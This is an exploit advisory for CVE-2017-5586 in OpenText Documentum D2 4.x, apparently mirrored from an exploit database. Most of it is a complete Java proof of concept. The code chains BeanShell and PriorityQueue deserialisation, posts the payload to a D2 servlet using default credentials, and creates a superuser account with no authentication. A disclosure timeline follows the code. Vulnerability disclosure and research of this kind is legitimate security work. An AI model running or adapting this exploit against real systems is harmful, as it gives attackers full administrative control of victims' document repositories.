CVE Identifier: CVE-2017-5586 Vendor: OpenText Affected products: Documentum D2 version 4.x Researcher: Andrey B. Panfilov Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Description: Document D2 contains vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialised data from untrusted sources, which leads to remote code execution Proof of concept: ===================================8<=========================================== import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.InputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.net.HttpURLConnection; import java.net.URL; import java.util.ArrayList; import java.util.Comparator; import java.util.List; import java.util.PriorityQueue; import bsh.Interpreter; import bsh.XThis; import com.documentum.fc.client.content.impl.ContentStoreResult; import com.documentum.fc.client.impl.typeddata.TypedData; /** * @author Andrey B. Panfilov * * Code below creates superuser account in underlying Documentum repository * usage: java DocumentumD2BeanShellPoc http://host:port/D2 * */ @SuppressWarnings("unchecked") public class DocumentumD2BeanShellPoc { public static void main(String[] args) throws Exception { String url = args[0]; String docbase = args[1]; String userName = args[2]; String payload = "compare(Object foo, Object bar) {new Interpreter()" + ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()" + ".getSessionRegistry().getAllSessions().iterator().next();" + "session=com.emc.d2.api.D2Session.getAdminSession(session, false);" + "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery(" + "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', " + "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} " + "catch (Exception e) {}; return 0;\");}"; Interpreter interpreter = new Interpreter(); interpreter.eval(String.format(payload, userName, userName, userName)); XThis x = new XThis(interpreter.getNameSpace(), interpreter); Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, }); PriorityQueue priorityQueue = new PriorityQueue(2, comparator); Object[] queue = new Object[] { 1, 1 }; setFieldValue(priorityQueue, "queue", queue); setFieldValue(priorityQueue, "size", 2); // actually we may send priorityQueue directly, but I want to hide // deserialization stuff from stacktrace :) Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder"); Constructor ctor = cls.getConstructor(); ctor.setAccessible(true); Object valueHolder = ctor.newInstance(); setFieldValue(valueHolder, "m_value", priorityQueue); List valueHolders = new ArrayList(); valueHolders.add(valueHolder); TypedData data = new TypedData(); setFieldValue(data, "m_valueHolders", valueHolders); ContentStoreResult result = new ContentStoreResult(); setFieldValue(result, "m_attrs", data); ByteArrayOutputStream baos = new ByteArrayOutputStream(); DataOutputStream dos = new DataOutputStream(baos); for (Character c : "SAVED".toCharArray()) { dos.write(c); } dos.write((byte) 124); dos.flush(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(result); oos.flush(); byte[] bytes = baos.toByteArray(); baos = new ByteArrayOutputStream(); dos = new DataOutputStream(baos); dos.writeInt(bytes.length); dos.write(bytes); dos.flush(); HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection(); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestMethod("POST"); conn.setUseCaches(false); conn.setDoOutput(true); conn.getOutputStream().write(baos.toByteArray()); conn.connect(); System.out.println("Response code: " + conn.getResponseCode()); InputStream stream = conn.getInputStream(); byte[] buff = new byte[1024]; int count = 0; while ((count = stream.read(buff)) != -1) { System.out.write(buff, 0, count); } } public static String makeUrl(String url) { if (!url.endsWith("/")) { url += "/"; } return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd&file_length=1000" + "&_username=dmc_wdk_preferences_owner&_password=webtop"; } public static Field getField(final Class clazz, final String fieldName) throws Exception { Field field = clazz.getDeclaredField(fieldName); if (field == null && clazz.getSuperclass() != null) { field = getField(clazz.getSuperclass(), fieldName); } field.setAccessible(true); return field; } public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } } ===================================>8=========================================== Disclosure timeline: 2016.02.28: Vulnerability discovered 2017.01.25: CVE Identifier assigned 2017.02.01: Vendor contacted, no response 2017.02.15: Public disclosure __ Regards, Andrey B. Panfilov # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-17]